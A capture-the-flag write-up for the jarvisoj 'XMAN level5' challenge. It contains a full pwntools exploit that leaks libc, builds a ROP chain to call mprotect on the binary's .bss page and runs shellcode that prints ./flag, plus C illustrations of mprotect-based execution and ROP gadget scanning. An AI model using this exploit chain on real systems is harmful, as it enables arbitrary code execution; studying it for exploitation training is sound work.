[XMAN]level5

Date: 2021-07-17

mmap and mprotect practice: assume that system and execve are disabled, and try to solve this challenge with mmap and mprotect.

nc pwn2.jarvisoj.com 9884


The attachment is the same binary as level3_x64.

mmap maps a file or other object into memory; mprotect changes the permissions (rwx) of a page-aligned range of addresses.

The binary has NX enabled, so neither the stack nor the data segments are executable and shellcode cannot simply be placed in the overflowed buffer. The plan is therefore to use mprotect to make the page at 0x600000 (the one holding .dynamic, .got, .data and .bss) rwx, read shellcode into the start of that page, and return into it. Three details shape the exploit: mprotect needs a page-aligned address and length, hence 0x600000 and 0x1000 rather than the exact shellcode address and size; mprotect and read both take their third argument in rdx, and the binary has no pop rdx gadget, so libc has to be leaked first and its gadgets used; and the shellcode and its buffer must stay below .dynamic/.got near the top of that page so they are not corrupted before they run. Since an existing page can be made executable in place, the mmap the challenge mentions is not actually needed here.
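To see the technique itself without the network round trips, here is a small C program (added here, not part of the original writeup) that does what stages 2 and 3 of the chain do: put bytes into a page that is not executable, make it executable with mprotect, and jump to it. It also shows the other side of NX: calling into the page before mprotect is a fault, not a call. The page comes from mmap rather than the binary's .bss, since the challenge names both calls; the "shellcode" is a stub that returns 42 so the result can be checked, and its byte encoding is the only architecture-specific part.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux value, in case strict ISO mode hides it */
#endif

/* "return 42" in machine code, chosen per architecture so this builds on an
 * x86-64 or an arm64 host.  Real shellcode (the exploit's open/read/write of
 * ./flag) is just more bytes in the same place. */
#if defined(__x86_64__)
static const uint8_t stub[] = {
    0xb8, 0x2a, 0x00, 0x00, 0x00,   /* mov eax, 42 */
    0xc3                            /* ret         */
};
#elif defined(__aarch64__)
static const uint8_t stub[] = {
    0x40, 0x05, 0x80, 0x52,         /* mov w0, #42 */
    0xc0, 0x03, 0x5f, 0xd6          /* ret         */
};
#else
#error "supply the 'return 42' stub bytes for this architecture"
#endif

typedef int (*stub_fn)(void);

/* Map a fresh RW page with mmap and copy the stub into it (NX: not executable). */
static uint8_t *rw_page_with_stub(long pagesz)
{
    uint8_t *page = mmap(NULL, (size_t)pagesz, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return NULL;
    memcpy(page, stub, sizeof stub);
    return page;
}

/* Stages 2 and 3 of the ROP chain in C: bytes are written while the page is
 * RW, then mprotect makes it executable and control jumps to it.
 * Returns the stub's value (42), or -1 if a syscall fails. */
int run_stub_via_mprotect(void)
{
    long pagesz = sysconf(_SC_PAGESIZE);
    uint8_t *page = rw_page_with_stub(pagesz);
    if (page == NULL)
        return -1;
    /* The exploit passes 7 (rwx); once the bytes are in place R-X suffices.
     * Address and length must be page-aligned, which is why the chain uses
     * 0x600000 and 0x1000 rather than the exact shellcode address and size. */
    if (mprotect(page, (size_t)pagesz, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, (size_t)pagesz);
        return -1;
    }
    /* No-op on x86; required on arm64 so the instruction cache sees the code. */
    __builtin___clear_cache((char *)page, (char *)page + sizeof stub);
    int r = ((stub_fn)(uintptr_t)page)();
    munmap(page, (size_t)pagesz);
    return r;
}

static sigjmp_buf fault_jb;
static void on_fault(int sig) { (void)sig; siglongjmp(fault_jb, 1); }

/* What NX buys the defender: the same stub called in the RW page, with no
 * mprotect, faults instead of running.  Returns 1 if the call faulted,
 * 0 if it ran anyway (NX not enforced, e.g. under some emulators), -1 if
 * mmap failed. */
int stub_faults_without_exec(void)
{
    long pagesz = sysconf(_SC_PAGESIZE);
    uint8_t *page = rw_page_with_stub(pagesz);
    if (page == NULL)
        return -1;
    struct sigaction sa, old_segv, old_bus;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);
    volatile int faulted = 1;
    if (sigsetjmp(fault_jb, 1) == 0) {
        ((stub_fn)(uintptr_t)page)();   /* with NX this faults */
        faulted = 0;
    }
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    munmap(page, (size_t)pagesz);
    return faulted;
}

int main(void)
{
    printf("call into rw- page faulted: %d\n", stub_faults_without_exec());
    printf("stub result after mprotect(R-X): %d\n", run_stub_via_mprotect());
    return 0;
}
```

Build with gcc and run it; the first line prints 1 on any NX-enforcing Linux. On a system that forbids anonymous executable mappings (SELinux execmem, W^X kernels) the mprotect call fails and the function returns -1, which is exactly the mitigation this exploit technique relies on being absent.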

The exploit:

from pwn import *

#io = process('./level3_x64')
io = remote('pwn2.jarvisoj.com', 9884)
elf = ELF('./level3_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')   # libc shipped with the challenge
context.arch = 'amd64'
context.os = 'linux'
#context.log_level = 'debug'

# Gadgets and addresses in the non-PIE binary (check with ROPgadget/objdump)
pop_rdi = 0x4006b3        # pop rdi; ret
pop_rsi_r15 = 0x4006b1    # pop rsi; pop r15; ret
write_plt = 0x4004B0
write_got = 0x600A58
read_plt = 0x4004C0
vuln_addr = 0x4005E6      # vulnerable function: return here to run the next stage

# Stage 1: leak write@got with write(1, write_got, <rdx>); rdx is whatever
# the previous read() left in it, so more than 8 bytes come back.
payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload += p64(0) + p64(write_plt) + p64(vuln_addr)
io.recvuntil(b'Input:\n')
io.send(payload)
write_addr = u64(io.recv(8))
info("write_addr: %#x" % write_addr)
libc_base = write_addr - libc.symbols['write']
info("libc_base: %#x" % libc_base)

# The binary has no pop rdx gadget, so take it (and a plain pop rsi) from libc.
# These offsets are for the provided libc-2.19.so only; re-derive them with
# ROPgadget --binary libc-2.19.so before using another build.
pop_rsi = 0x24885 + libc_base   # pop rsi; ret
info("pop_rsi: %#x" % pop_rsi)
pop_rdx = 0x286 + libc_base     # pop rdx; ret
info("pop_rdx: %#x" % pop_rdx)
mprotect_addr = libc_base + libc.symbols['mprotect']
info("mprotect_addr: %#x" % mprotect_addr)

# Stage 2: mprotect(0x600000, 0x1000, 7): page-aligned address and length,
# covering the binary's .dynamic/.got/.data/.bss page.
payload = b'a' * 136 + p64(pop_rdi) + p64(0x600000) + p64(pop_rsi) + p64(0x1000)
payload += p64(pop_rdx) + p64(7) + p64(mprotect_addr) + p64(vuln_addr)
io.recvuntil(b'Input:\n')
io.send(payload)

# Stage 3: read(0, 0x600000, len(shellcode)), then return to 0x600000.
# The shellcode opens ./flag (fd 3, the first free descriptor), reads it into
# 0x600500 (still below .got at 0x600A58) and writes it to stdout.
shellcode = shellcraft.open('./flag')
shellcode += shellcraft.read(3, 0x600500, 0x100)
shellcode += shellcraft.write(1, 0x600500, 0x100)
shellcode = asm(shellcode)
payload = b'a' * 136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x600000)
payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(0x600000)
io.recvuntil(b'Input:\n')
io.send(payload)
# Send the shellcode separately so it is consumed by the read() in the chain,
# not by the vulnerable function's own read() of the payload.
sleep(0.5)
io.send(shellcode)

io.interactive()
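The gadget addresses hard-coded above (0x4006b3, 0x4006b1, and the libc offsets 0x24885 and 0x286) come from scanning executable bytes for the encodings of pop reg and ret. The C program below, added here as an illustration and not part of the writeup, does that scan over a constructed copy of the __libc_csu_init epilogue gcc emits (pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret), placed at an assumed base of 0x4006aa. Because x86 instructions can be decoded starting from any byte, those bytes also yield pop rsi; pop r15; ret at 0x4006b1 and pop rdi; ret two bytes later at 0x4006b3, which is where the writeup's two binary gadgets come from. Running the same scan over the provided libc-2.19.so is how to confirm the 0x24885 and 0x286 offsets before reusing this exploit against a different libc build.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86-64 "pop r64" is one byte, 0x58 + register number; r8..r15 carry the
 * REX.B prefix 0x41 in front.  "ret" is 0xc3. */
static const char *const reg_lo[8] = {"rax","rcx","rdx","rbx","rsp","rbp","rsi","rdi"};
static const char *const reg_hi[8] = {"r8","r9","r10","r11","r12","r13","r14","r15"};

struct gadget {
    uint64_t addr;
    char text[64];
};

/* Decode a single pop at p; returns its length (1 or 2) and sets *reg to the
 * register name, or returns 0 if p does not start a pop. */
static size_t decode_pop(const uint8_t *p, size_t avail, const char **reg)
{
    if (avail >= 1 && p[0] >= 0x58 && p[0] <= 0x5f) {
        *reg = reg_lo[p[0] - 0x58];
        return 1;
    }
    if (avail >= 2 && p[0] == 0x41 && p[1] >= 0x58 && p[1] <= 0x5f) {
        *reg = reg_hi[p[1] - 0x58];
        return 2;
    }
    return 0;
}

/* Find every "pop ...; [pop ...;] ret" sequence (one or two pops) in buf,
 * trying every byte offset, since a gadget need not start on an instruction
 * boundary the compiler intended.  base is the virtual address of buf[0].
 * Fills out with up to max gadgets and returns the count. */
size_t find_pop_ret(const uint8_t *buf, size_t len, uint64_t base,
                    struct gadget *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i++) {
        char text[64] = "";
        size_t used = 0, off = i, pops = 0, k;
        const char *reg;
        while (pops < 2 && (k = decode_pop(buf + off, len - off, &reg)) != 0) {
            used += (size_t)snprintf(text + used, sizeof text - used, "pop %s; ", reg);
            off += k;
            pops++;
        }
        if (pops > 0 && off < len && buf[off] == 0xc3) {
            out[n].addr = base + i;
            snprintf(out[n].text, sizeof out[n].text, "%sret", text);
            n++;
        }
    }
    return n;
}

/* Constructed input: the epilogue gcc emits for __libc_csu_init in x86-64
 * binaries (pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret).  The
 * base 0x4006aa is an assumption chosen so the results line up with the
 * writeup's pop_rsi_r15 = 0x4006b1 and pop_rdi = 0x4006b3. */
static const uint8_t csu_tail[] = {
    0x5b, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0xc3
};
#define CSU_TAIL_BASE 0x4006aaULL

int main(void)
{
    struct gadget g[16];
    size_t n = find_pop_ret(csu_tail, sizeof csu_tail, CSU_TAIL_BASE, g, 16);
    for (size_t i = 0; i < n; i++)
        printf("0x%llx: %s\n", (unsigned long long)g[i].addr, g[i].text);
    return 0;
}
```

To apply it to a real file, read the executable segments (objdump -h or the program headers) into buf with their virtual address as base; a full tool such as ROPgadget also handles longer sequences and other terminators, but for the pop/ret chains this exploit needs the scan above is the whole idea.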

Original source: https://www.cnblogs.com/hktk1643/p/15024448.html